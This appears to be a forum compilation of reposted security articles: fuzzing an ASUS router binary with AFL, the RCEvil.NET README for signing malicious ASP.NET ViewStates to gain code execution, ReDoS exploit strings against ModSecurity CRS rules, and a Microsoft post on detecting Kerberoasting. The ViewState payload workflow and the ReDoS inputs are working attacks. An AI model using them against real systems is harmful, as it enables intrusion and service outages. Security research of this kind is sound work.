$ readelf -s usr/sbin/asusdiscovery
Symbol table '.dynsym' contains 85 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
1: 0040128c 236 FUNC GLOBAL DEFAULT 10 safe_fread
2: 00414020 0 NOTYPE GLOBAL DEFAULT 18 _fdata
3: 00000001 0 SECTION GLOBAL DEFAULT ABS _DYNAMIC_LINKING
4: 0041c050 0 NOTYPE GLOBAL DEFAULT ABS _gp
..............SNIP....................
33: 004141b0 4 OBJECT GLOBAL DEFAULT 22 a_bEndApp
34: 00402cec 328 FUNC GLOBAL DEFAULT 10 ParseASUSDiscoveryPackage
35: 00403860 0 FUNC GLOBAL DEFAULT UND sprintf
...............SNIP.....................

With this symbol in mind, we can open the binary up in Ghidra and have the decompiler give us a rough idea of how it's working:

undefined4 ParseASUSDiscoveryPackage(int iParm1)
{
  ssize_t sVar1;
  socklen_t local_228;
  undefined4 local_224;
  undefined4 local_220;
  undefined4 local_21c;
  undefined4 local_218;
  undefined auStack532 [516];
  myAsusDiscoveryDebugPrint("----------ParseASUSDiscoveryPackage Start----------");
  if (a_bEndApp != 0) {
    myAsusDiscoveryDebugPrint("a_bEndApp = true");
    return 0;
  }
  local_228 = 0x10;
  memset(auStack532,0,0x200);
  sVar1 = recvfrom(iParm1,auStack532,0x200,0,(sockaddr *)&local_224,&local_228);
  if (0 < sVar1) {
    PROCESS_UNPACK_GET_INFO(auStack532,local_224,local_220,local_21c,local_218);
    return 1;
  }
  myAsusDiscoveryDebugPrint("recvfrom function failed");
  return 0;
}

The function appears to be instantiating a 512-byte buffer and reading from a given network file descriptor through the recvfrom function. A quick visit to recvfrom's manpage reveals that the second argument going into recvfrom will contain the network input, the input we can control.
RECV(2) Linux Programmer's Manual RECV(2)

NAME
recv, recvfrom, recvmsg - receive a message from a socket

SYNOPSIS
#include <sys/types.h>
#include <sys/socket.h>
ssize_t recv(int sockfd, void *buf, size_t len, int flags);
ssize_t recvfrom(int sockfd, void *buf, size_t len, int flags, struct sockaddr *src_addr, socklen_t *addrlen);

This user input is immediately passed to the PROCESS_UNPACK_GET_INFO function. This function is responsible for parsing the user input and relaying that information to the router. Opening the function in Ghidra reveals a large parsing function. This looks perfect for fuzzing!

The next step is interacting with the function and providing input into that first argument. The first step towards running this as an independent function is recovering the function prototype. Ghidra shows the defined function prototype as below.

void PROCESS_UNPACK_GET_INFO(char *pcParm1,undefined4 uParm2,in_addr iParm3)

Using stub-builder, you can take this prototype information and generate the hooking stub.

Instrumenting asusdiscovery

Similarly to the PoC of the LD_PRELOAD main hook shown above, I needed to hook the main function. For uClibc that function is __uClibc_main. Using the same trick as above, we'll define a function prototype for the function we want to call, then hook uClibc's main function and jump directly to the function we want to call with our arguments. To make this process easier, I created a tool to identify function prototypes and slot them into templated C code. The current iteration of stub-builder will accept a file and a given function to instrument. The tool is imperfect and will use radare2 to identify (often wrongly) function prototypes and place them into the C stub.

$ stub_builder -h
usage: stub_builder [-h] --File FILE {hardcode,recover} ...
positional arguments:
{hardcode,recover} Hardcode or automatically use prototypes and addresses
hardcode Use absolute offsets and prototypes
recover Use radare2 to recover function address and prototype

optional arguments:
-h, --help show this help message and exit
--File FILE, -F FILE ELF executable to create stub from

An example for the command can be seen below. The stub builder uses radare2 for its function recovery and fails to identify the first argument as a char*, so we need to fix up the main_hook.c.

$ stub_builder -F usr/sbin/asusdiscovery recover name PROCESS_UNPACK_GET_INFO
[+] Modify main_hook.c to call instrumented function
[+] Compile with "gcc main_hook.c -o main_hook.so -fPIC -shared -ldl"
[+] Hook with: LD_PRELOAD=./main_hook.so ./usr/sbin/asusdiscovery
[+] Created main_hook.c

Hardcoded values can be inserted instead. The below command supplies the address, argument prototype and the expected return type:

$ stub_builder -F usr/sbin/asusdiscovery hardcode 0x00401f30 "(char *, int, int)" "int"

#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
//gcc main_hook.c -o main_hook.so -fPIC -shared -ldl

/* Trampoline for the real main() */
static int (*main_orig)(int, char **, char **);

/* Our fake main() that gets called by __libc_start_main() */
int main_hook(int argc, char **argv, char **envp)
{
    //<arg declarations here>
    char user_buf[512] = {"\x00"};
    //scanf("%512s", user_buf);
    read(0, user_buf, 512);
    int (*do_thing_ptr)(char *, int, int) = 0x401f30;
    int ret_val = (*do_thing_ptr)(user_buf, 0, 0);
    printf("Ret val %d\n",ret_val);
    return 0;
}

//uClibc_main
/*
 * Wrapper for __libc_start_main() that replaces the real main
 * function with our hooked version.
 */
int __uClibc_main(
    int (*main)(int, char **, char **),
    int argc,
    char **argv,
    int (*init)(int, char **, char **),
    void (*fini)(void),
    void (*rtld_fini)(void),
    void *stack_end)
{
    /* Save the real main function address */
    main_orig = main;

    /* Find the real __libc_start_main()...
     */
    typeof(&__uClibc_main) orig = dlsym(RTLD_NEXT, "__uClibc_main");

    /* ... and call it with our custom main function */
    return orig(main_hook, argc, argv, init, fini, rtld_fini, stack_end);
}

The code above will accept input from STDIN and pass it into the parsing function directly. This enables us to test and get return values of the function without any networking components required.

Running the code

Cross compiling the shared object using the provided cross compilers is shown below. The resulting file will be named main_hook.so.

$ /opt/cross-compile/mipsel-linux-uclibc/bin/mipsel-buildroot-linux-uclibc-gcc main_hook.c -o main_hook.so -fPIC -shared -ldl

Using this library is shown below; with my toolchain it doesn't link the libdl library, which results in the error below:

$ qemu-mipsel -L /home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root -E LD_PRELOAD=/main_hook.so ./usr/sbin/asusdiscovery
./usr/sbin/asusdiscovery: can't resolve symbol 'dlsym'

Adding the libdl library to the LD_PRELOAD fixes this problem and resolves the dlsym function.

$ qemu-mipsel -L /home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root -E LD_PRELOAD=/lib/libdl.so.0:/main_hook.so ./usr/sbin/asusdiscovery
abcd
Ret val 4

We now have the binary running, and it's accepting our input and passing it directly to the function. The next stage is generating a set of valid input data to seed our fuzzer with.

Generating valid input for a test corpus

Sending in random strings of "A"s will not yield newly discovered paths through the parsing function. Looking at the function decompilation, we can see there is a quick check performed in a function titled UnpackGetInfo_NEW. This is the first function we need to look at, to determine if there are any early exits from initial parses.

memset(&local_320,0,0xf8);
memset(&uStack1000,0,200);
iVar28 = UnpackGetInfo_NEW(pcParm1,&local_320,&uStack1000);
iVar39 = a_GetRouterCount;

This function first checks for a set of magic bytes before continuing.
It's looking for "\x0c\x16\x1f\x00" to be the first bytes of the network input (the check reads a little-endian short at offset 2). Without these magic bytes it will exit early and indicate through its return code to discard the input.

int UnpackGetInfo_NEW(char *user_input,undefined4 *param_2,undefined4 *param_3)
{
  undefined4 uVar1;
  undefined4 uVar2;
  undefined4 uVar3;
  undefined4 *puVar4;
  undefined4 *puVar5;
  undefined4 *puVar6;
  if (((*user_input != '\f') || (user_input[1] != 0x16)) || (*(short *)(user_input + 2) != 0x1f)) {
    return 1;
  }

Supplying this magic value immediately returns a different result when running the binary:

$ python2 -c 'print "\x0c\x16\x1f\x00" + "A"*100' | qemu-mipsel -L . -E LD_PRELOAD=/lib/libdl.so.0:/main_hook.so ./usr/sbin/asusdiscovery
Ret val 1

The function returns more than just a single return value based on the parse or unpack. There appear to be checks on lines 12, 15, 32 and 33, and it returns a result based on the input on line 50.

int UnpackGetInfo_NEW(char *user_input,undefined4 *param_2,undefined4 *param_3)
{
  undefined4 uVar1;
  undefined4 uVar2;
  undefined4 uVar3;
  undefined4 *puVar4;
  undefined4 *puVar5;
  undefined4 *puVar6;
  if (((*user_input != '\f') || (user_input[1] != 0x16)) || (*(short *)(user_input + 2) != 0x1f)) {
    return 1;
  }
  puVar6 = (undefined4 *)(user_input + 8);
  do {
    puVar5 = puVar6;
    puVar4 = param_2;
    uVar1 = puVar5[1];
    uVar2 = puVar5[2];
    uVar3 = puVar5[3];
    *puVar4 = *puVar5;
    puVar4[1] = uVar1;
    puVar4[2] = uVar2;
    puVar6 = puVar5 + 4;
    puVar4[3] = uVar3;
    param_2 = puVar4 + 4;
  } while (puVar6 != (undefined4 *)(user_input + 0xf8));
  uVar1 = puVar5[5];
  puVar4[4] = *puVar6;
  puVar4[5] = uVar1;
  if ((*(short *)(user_input + 0x110) == -0x7f7e) && (puVar6 = (undefined4 *)(user_input + 0x110), (user_input[0x112] & 1U) != 0)) {
    do {
      puVar5 = puVar6;
      puVar4 = param_3;
      uVar1 = puVar5[1];
      uVar2 = puVar5[2];
      uVar3 = puVar5[3];
      *puVar4 = *puVar5;
      puVar4[1] = uVar1;
      puVar4[2] = uVar2;
      puVar6 = puVar5 + 4;
      puVar4[3] = uVar3;
      param_3 = puVar4 + 4;
    } while (puVar6 != (undefined4 *)(user_input + 0x1d0));
    uVar1 = puVar5[5];
    puVar4[4] = *puVar6;
    puVar4[5] = uVar1;
    return (uint)((user_input[0x112] & 0x10U) != 0) + 5;
  }
  return 0;
}

This is a perfect time to break out angr and create a valid input that hits line 50! The following code will create a 300-byte symbolic buffer and have angr solve the constraints required to pass each check in the unpacking function, yielding all potential return results. We are interested in the analysis path that reaches the furthest part of the parsing function. The script below will print out each path's end address and the input required to reach that path.

import angr
import angr.sim_options as so
import claripy

symbol = "UnpackGetInfo_NEW"

# Create a project with history tracking
p = angr.Project('/home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root/usr/sbin/asusdiscovery')
extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY}

# User input will be 300 symbolic bytes
user_arg = claripy.BVS("user_arg", 300*8)

# State starts at function address
start_addr = p.loader.find_symbol(symbol).rebased_addr
state = p.factory.blank_state(addr=start_addr, add_options=extras)

# Store symbolic user_input buffer
state.memory.store(0x100000, user_arg)
state.regs.a0 = 0x100000

# Run to exhaustion
simgr = p.factory.simgr(state)
simgr.explore()

# Print each path and the inputs required
for path in simgr.unconstrained:
    print("{} : {}".format(path, hex([x for x in path.history.bbl_addrs][-1])))
    u_input = path.solver.eval(user_arg, cast_to=bytes)
    print(u_input)

One of the outputs is shown below, and this input can then be sent back into the program through the above qemu command to validate that it passes the checks.
<SimState @ <BV32 reg_ra_51_32{UNINITIALIZED}>> : 0x401c4c b'\x0c\x16\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x80\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ### Running the input $ printf 
'\x0c\x16\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x80\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | qemu-mipsel -L . -E LD_PRELOAD=/lib/libdl.so.0:/main_hook.so ./usr/sbin/asusdiscovery Ret val 1 I've put each of these inputs into individual files for AFL to read from later. 
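Keeping only the seeds that pass the magic-byte gate, and writing each one to its own file, can be sketched in Python. The check mirrors the first if in UnpackGetInfo_NEW, assuming little-endian byte order; the helper and the afl_input_demo directory name are illustrative, not part of the original workflow:

```python
import struct
from pathlib import Path

def passes_magic_check(data: bytes) -> bool:
    """Mirror of: input[0]=='\\x0c' && input[1]==0x16 && *(short*)(input+2)==0x1f."""
    return (len(data) >= 4 and data[0] == 0x0C and data[1] == 0x16
            and struct.unpack_from("<h", data, 2)[0] == 0x1F)

def write_corpus(seeds, corpus_dir="afl_input"):
    """Write each seed that survives the magic check to test_caseN files."""
    out = Path(corpus_dir)
    out.mkdir(exist_ok=True)
    kept = [s for s in seeds if passes_magic_check(s)]
    for i, data in enumerate(kept, start=1):
        (out / f"test_case{i}").write_bytes(data)
    return len(kept)

seeds = [b"\x0c\x16\x1f\x00" + bytes(296), b"A" * 300]
print(write_corpus(seeds, corpus_dir="afl_input_demo"))  # 1 - the all-"A" seed is filtered out
```

Seeding AFL only with inputs that survive the early-exit check keeps the fuzzer from wasting cycles rediscovering the magic bytes.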
$ ls afl_input/
test_case1 test_case2 test_case3 test_case4 test_case5

Fuzzing the function

Using the AFL build process outlined here will provide AFL with qemu mode, which will fuzz asusdiscovery with the script:

#!/bin/bash
export "QEMU_SET_ENV=LD_PRELOAD=/lib/libdl.so.0:/main_hook.so"
export "QEMU_LD_PREFIX=/home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root"
export "AFL_INST_LIBS=1"
#export "AFL_NO_FORKSRV=1"
BINARY="/home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root/usr/sbin/asusdiscovery"
afl-fuzz -i afl_input -o output -m none -Q $BINARY

You will get some incredibly slow fuzzing at about 1-2 executions per second. The AFL fork server is taking way too long to spawn off newly forked processes. Adding AFL_NO_FORKSRV=1 will prevent AFL from creating a fork server just before main and forking off new processes. For this type of hooking and emulation it runs much faster, at about 85 executions per second:

We can do better... Specifically, we can use Abiondo's fork of AFL, which he describes in his blog post here. Abiondo implemented an idea for QEMU that is quoted as speeding up the QEMU emulation by 3 to 4 times. That should put us at 300 or 400 executions per second.

My idea was to move the instrumentation into the translated code by injecting a snippet of TCG IR at the beginning of every TB. This way, the instrumentation becomes part of the emulated program, so we don't need to go back into the emulator at every block, and we can re-enable chaining.

Downloading and running the fork of AFL follows the exact same build process:

git clone https://github.com/abiondo/afl.git
cd afl
make
cd qemu_mode
export CPU_TARGET=mipsel
./build_qemu_support.sh

Rerunning the previous fuzzing command script WITHOUT the AFL_NO_FORKSRV environment variable produces some absolutely insane results:

Final fuzzing results

After about 24 hours of fuzzing, hardly any new paths were discovered.
Doing some more static analysis on the parsing functions revealed very few spots where any potentially dangerous user input could corrupt anything.

$ cat output_fast/fuzzer_stats
start_time : 1555381507
last_update : 1555385229
fuzzer_pid : 61241
cycles_done : 272
execs_done : 8226287
execs_per_sec : 2055.33
paths_total : 85
paths_favored : 19
paths_found : 81
paths_imported : 0
max_depth : 6
cur_path : 49
pending_favs : 0
pending_total : 0
variable_paths : 0
stability : 100.00%
bitmap_cvg : 1.15%
unique_crashes : 0
unique_hangs : 0
last_path : 1555382334
last_crash : 0
last_hang : 0
execs_since_crash : 8226287
exec_timeout : 20
afl_banner : asusdiscovery
afl_version : 2.52b
target_mode : qemu
command_line : afl-fuzz -i afl_input -o output -m none -Q /home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root/usr/sbin/asusdiscovery

Final thoughts

Over the course of using the LD_PRELOAD trick paired with jumping directly to a function I wanted to fuzz, I was able to save tons of time inside of GDB trying to see which code paths were valid. By using Abiondo's fork of AFL I was able to get execution speeds on par with AFL's compiled-in instrumentation. Getting thousands of executions per second doesn't generally happen when fuzzing applications in AFL's QEMU mode, and I was happy to see 2000-plus executions per second.

Sursa: https://breaking-bits.gitbook.io/breaking-bits/vulnerability-discovery/reverse-engineering/modern-approaches-toward-embedded-research
-
RCEvil.NET

RCEvil.NET is a tool for signing malicious ViewStates with a known validationKey. Any (even empty) ASPX page is a valid target. See http://illuminopi.com/ for full details on the attack vector.

Prerequisites

- Visual Studio Community: https://visualstudio.microsoft.com/vs/community/
- Local installation of ysoserial.net: https://github.com/pwntester/ysoserial.net

Usage

1. Build your payload in ysoserial.net:

ysoserial.exe -g TypeConfuseDelegate -f ObjectStateFormatter -o base64 -c "calc.exe"

2. Sign the payload using RCEvil.NET:

RCEvil.NET.exe -u [URL] -v [VALIDATION_KEY] -m [DIGEST_TYPE] -p [YSOSERIAL.NET_PAYLOAD]

3. Direct the payload to the target ASPX page

Examples

Generate the base payload in ysoserial.net:

ysoserial.exe -g TypeConfuseDelegate -f ObjectStateFormatter -o base64 -c "calc.exe"
/wEyxBEAAQAAAP////8...

Sign the ysoserial.net payload with an HMAC using RCEvil.NET:

RCEvil.NET.exe -u /Default.aspx -v 000102030405060708090a0b0c0d0e0f10111213 -m SHA1 -p /wEyxBEAAQAAAP////8...

-=[ ViewState Toolset ]=-
URL: /Default.aspx
Digest Algorithm: SHA1
ValidationKey: 000102030405060708090a0b0c0d0e0f10111213
Modifier: 34030bca

-=[ Final Payload ]=-
%2fwEyxBEAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwC...

Finally, send the HMAC-signed ViewState payload to the target:

POST /Default.aspx HTTP/1.1
Host: 192.168.112.148
Content-Type: application/x-www-form-urlencoded
Content-Length: 3072

__VIEWSTATE=%2fwEyxBEAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwC...

Sursa: https://github.com/Illuminopi/RCEvil.NET
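At its heart, the signing step is a keyed HMAC-SHA1 over the serialized ViewState. The following Python sketch is illustrative only, not RCEvil.NET's actual code: it assumes a simplified layout in which the 20-byte MAC is simply appended to the serialized payload, and it treats the page-specific modifier as an opaque byte string (the real ASP.NET MAC computation has more moving parts):

```python
import base64
import hashlib
import hmac

def sign_viewstate(payload_b64, validation_key_hex, modifier=b""):
    """Append an HMAC-SHA1 over (payload || modifier) to the payload.

    Simplified model of MAC'ing an ObjectStateFormatter blob with a
    known validationKey; the modifier is passed in pre-computed.
    """
    payload = base64.b64decode(payload_b64)
    key = bytes.fromhex(validation_key_hex)
    mac = hmac.new(key, payload + modifier, hashlib.sha1).digest()
    return base64.b64encode(payload + mac).decode()

# Example with the validationKey and modifier values shown above;
# the payload here is a placeholder, not a real gadget chain.
signed = sign_viewstate(
    base64.b64encode(b"serialized-gadget-chain").decode(),
    "000102030405060708090a0b0c0d0e0f10111213",
    modifier=bytes.fromhex("34030bca"),
)
print(signed)  # base64 blob: original payload followed by a 20-byte HMAC
```

The output would still need URL-encoding (as in the Final Payload above) before being placed in the __VIEWSTATE parameter.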
-
How I found 5 ReDOS Vulnerabilities in Mod Security CRS

Somdev Sangwan
Apr 22

This write-up assumes that the reader has intermediate (or higher) knowledge of regular expressions. If you are not very familiar with regular expressions, you might want to check out this tutorial. You may also want to read my introductory article about ReDOS.

I have been spending a good amount of time writing ReDOS exploits and studying WAFs lately. To practice my skills in the real world, I chose the Mod Security Core Rule Set because it has tons of regular expressions and, on top of that, these regular expressions are being used by WAFs in the wild to detect attacks. Two birds with one stone!

Well, CRS has 29 configuration files which contain tons of regular expressions, so it wasn't possible for me to go through all of them, so I decided to automate some of the work. The program I wrote for this purpose isn't public at the moment because it's in the alpha phase, but I am planning to release it soon.

Anyway, after extracting potentially vulnerable patterns, I used regex101.com to identify and remove alternate sub-patterns, e.g. removing (fine) from ((fine)|(vulnerable)). I also used RegexBuddy to analyze the impact of different exploit approaches and then confirmed the exploits with the Python interpreter. Now, let's talk about the different exploitable sub-patterns I found and how I wrote exploits for them.

Case #1

Pattern: (?:(?:^[\"'`\\\\]*?[^\"'`]+[\"'`])+|(?:^[\"'`\\\\]*?[\d\"'`]+)+)\s

Exploit: """""""""""""" (about 1000 "s)

Why does this exploit work?

Intersecting alternate patterns

This pattern consists of two alternate sub-patterns. Both alternate patterns start with ^[\"'`\\\\]*?, which causes the regex engine to keep looking for both patterns and hence increases the number of permutations. In the second alternate pattern, the tokens [\"'`\\\\]*? and [\d\"'`]+ intersect, and both of them match ", ' and `.
Nested repetition operators

The structure of this sub-pattern is ((pattern 1)+|(pattern 2)+)+ and it's clear that it's using nested repetition operators, which dramatically increases the complexity.

Case #2

Pattern: for(?:/[dflr].*)* %+[^ ]+ in\(.*\)\s?do

Vulnerable part: for(?:/[dflr].*)* %

Exploit: for/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r

Why does this exploit work?

Let's take a look at how the string is matched, step by step:

f
fo
for
for/
for/r
for/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r

The last match is made by .*, but the pattern fails to match our exploit string completely because our string doesn't have % at the end, which is what the pattern wants to match next. In the hope of matching, it goes one step backward:

for/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/r/

But it still doesn't match. You must be thinking that it would go one more step backward and keep doing that until it reaches the end and realizes it doesn't match. Well, you are not wrong, but a repetition operator applied over another repetition operator makes things more complex. The fact that /r can be matched by both .* and /[dflr] makes things even worse. I am not sure how many steps it goes through before failing, but RegexBuddy 4 has a limit of 1,000,000 steps, so we don't really know.

Case #3

Pattern: (?:\s|/\*.*\*/|//.*|#.*)*\(.*\)

Exploit: ################################################

Why does this exploit work?

The (?:\s|/\*.*\*/|//.*|#.*)* part of the pattern consists of 4 alternate patterns, and 3 of them have the good old .*, which can match anything. When the regex engine compares the pattern against the string, the only part which matches is the last one, but because there's no () as required by the pattern, it fails to match, and the regex engine goes nuts because there are nested repetition operators placed in such a way that adding a # to the string makes the number of steps to be tried grow exponentially.
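The "confirmed the exploits with the Python interpreter" step can be reproduced for Case #2 like this. The repetition counts below are kept deliberately small so the demo finishes quickly; the real exploit strings use many more /r groups:

```python
import re
import time

# Vulnerable sub-pattern from Case #2, truncated after the ' %'
# that forces the failure and the backtracking.
pattern = re.compile(r'for(?:/[dflr].*)* %')

def time_match(n):
    """Time a (failing) match against 'for' followed by n '/r' groups."""
    s = 'for' + '/r' * n
    start = time.perf_counter()
    match = pattern.search(s)  # always fails: the string contains no ' %'
    return match, time.perf_counter() - start

for n in (4, 8, 12, 14):
    match, elapsed = time_match(n)
    print(f'n={n:2d}  match={match}  time={elapsed:.4f}s')
# Every extra '/r' roughly doubles the number of ways the engine can
# split the string between .* and the repeated group, so the time
# grows exponentially with n.
```

Pushing n toward the ~24 groups of the actual exploit string makes the match take long enough to starve a WAF worker.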
The last case was found in 3 different rules, so that explains why I discussed only 3 cases. The following CVE IDs were assigned to the vulnerabilities:

CVE-2019-11387
CVE-2019-11388
CVE-2019-11389
CVE-2019-11390
CVE-2019-11391

It sucks how Medium doesn't let you set a featured image without adding it to the article itself.

Sursa: https://medium.com/@somdevsangwan/how-i-found-5-redos-vulnerabilities-in-mod-security-crs-ce8474877e6e?sk=c64852245215d6fead387acbd394b7db
-
Detecting LDAP based Kerberoasting with Azure ATP

In a typical Kerberoasting attack, attackers exploit LDAP vulnerabilities to generate a list of all user accounts with a Kerberos Service Principal Name (SPN) available. Once successful at listing these accounts, attackers request Kerberos Service Tickets for each user account with an SPN and later perform offline brute force on the encrypted part of the Kerberos tickets. This action helps attackers locate a password that belongs to a domain account. Domain account passwords enable attackers to move laterally in your domain freely.

Environments where the Kerberos Ticket Granting Service (TGS) ticket is encrypted with a weak cipher, and the cipher is generated from a well-known password (not randomly generated), are prime targets for successful brute force attacks of this type. The following attack logic is often used to find an organization's weakest link and perform LDAP based Kerberoast attacks.

Figure 1 - Typical Kerberoasting attack flow

Typical LDAP based Kerberoasting attack flow and result:

Step 1: Identify

In this attack phase, attackers use LDAP to query and locate all user accounts with a Service Principal Name (SPN). Running this LDAP query is possible for all user accounts in a domain.

Figure 2 - LDAP query that looks for all user accounts with an SPN set

Step 2: Enumerate

In this phase of the attack, a request is made for a Kerberos TGS ticket to the SPN using a valid TGT.

Figure 3 - TGS request to ExampleService of user1 by user2

Figure 4 - TGS response with ticket to ExampleService of user1

Step 3: Brute force

In the brute force phase of the attack, by using commonly available password cracking tools on accounts with commonly used passwords, attackers easily succeed at obtaining the password. In the following example, a commonly used password cracking tool, JohnTheRipper, performs a successful brute force using a rainbow table.
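The Step 1 query boils down to a single LDAP filter. A minimal sketch follows; the filter is the standard one for SPN reconnaissance, while the server name, credentials, and base DN in the commented-out ldap3 calls are placeholders showing one possible way to issue it against a real domain controller:

```python
# Standard SPN-discovery filter: every user object that has at least
# one servicePrincipalName registered.
SPN_FILTER = '(&(objectClass=user)(servicePrincipalName=*))'
ATTRIBUTES = ['sAMAccountName', 'servicePrincipalName']

def build_spn_query(base_dn):
    """Return the (base, filter, attributes) triple for the search."""
    return base_dn, SPN_FILTER, ATTRIBUTES

base, ldap_filter, attrs = build_spn_query('DC=example,DC=local')
print(ldap_filter)  # -> (&(objectClass=user)(servicePrincipalName=*))

# Against a live DC this could be issued with the ldap3 library, e.g.:
#   from ldap3 import Server, Connection, NTLM, SUBTREE
#   conn = Connection(Server('dc01.example.local'), user='EXAMPLE\\user',
#                     password='...', authentication=NTLM, auto_bind=True)
#   conn.search(base, ldap_filter, search_scope=SUBTREE, attributes=attrs)
```

Any authenticated domain user can run this query, which is exactly why the detection described later focuses on abnormal enumeration behavior rather than on the query itself.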
Figure 5 - Cracked password using a rainbow table

Step 4: Attack

In cases where the attempted brute force attack (shown previously) is successful, attackers use the newly obtained clear-text password to log in to remote machines or access cloud resources and files.

Figure 6 - Interactive clear-text logon

How can you detect and prevent Kerberoast attacks from succeeding?

Azure Advanced Threat Protection (Azure ATP) has risen to the Kerberoasting challenge and developed new methods to detect when malicious actors are attempting to perform LDAP based reconnaissance on your domain. While this type of attack is difficult to detect, and LDAP's extensive query language presented additional challenges, our security research work involved differentiating legitimate workflows from malicious behavior and surfacing all related activities and entities.

Our newest security alert involves smart behavioral detection backed by extensive machine learning, designed to raise an alert when any type of abnormal enumeration (including SPN enumeration), or queries on sensitive security groups, is detected. Starting from v2.72, Azure ATP issues a Security principal reconnaissance (LDAP) alert when the first stage of a Kerberoasting attack attempt is detected on the domains we monitor. Each alert includes vital information for use in your investigation and remediation:

1. Identification of malicious activity
2. Attempted enumeration details and specifics
3. Historical comparisons and activity correlation
4. Suggested remediation steps

The following workflow explains how to use Azure ATP alerts to detect and remediate Kerberoasting attempts on your domain.

Step 1: Review the alert to identify the actors and entities involved.
Figure 7 - Azure ATP alert on suspicious enumerations

Step 2: Filter activities to review resource access on the entity involved

Figure 8 - Filter for resource access activities on Client1's profile

Step 3: Use the filter results to investigate the resource access activities

Figure 9 - Investigate the resource access activity (generated by the Kerberos Ticket Granting Service) for ExampleService/User1

Step 4: Filter Interactive logon and Credential validation for the accessed entity

Figure 10 - Filter Interactive logon and Credential validation on User1's profile

Step 5: Review logon and access attempts

Figure 11 - User1's clear-text password was used to log on interactively on Client2

Step 6: Remediate possible risks

- Force a password reset on the compromised account
- Require use of long and complex passwords for users with service principal accounts: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/minimum...
- Replace the user account with a Group Managed Service Account (gMSA): https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-manage...

Kerberoasting remains a popular attack method and a heavily discussed security issue, but the effects of a successful Kerberoasting attack are real. Make sure your security team is aware of common Kerberoasting risks and strategies, along with the tools and alerts Azure ATP offers to help protect your domain. As always, we welcome your feedback about our work, and we are interested in learning more about the security threats and risks you encounter. For more information about features and threat protection, or to learn how we can help, contact us.
Get Started Today

If you are just starting your journey, begin trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace:

- Windows Defender ATP trial
- Office 365 E5 trial
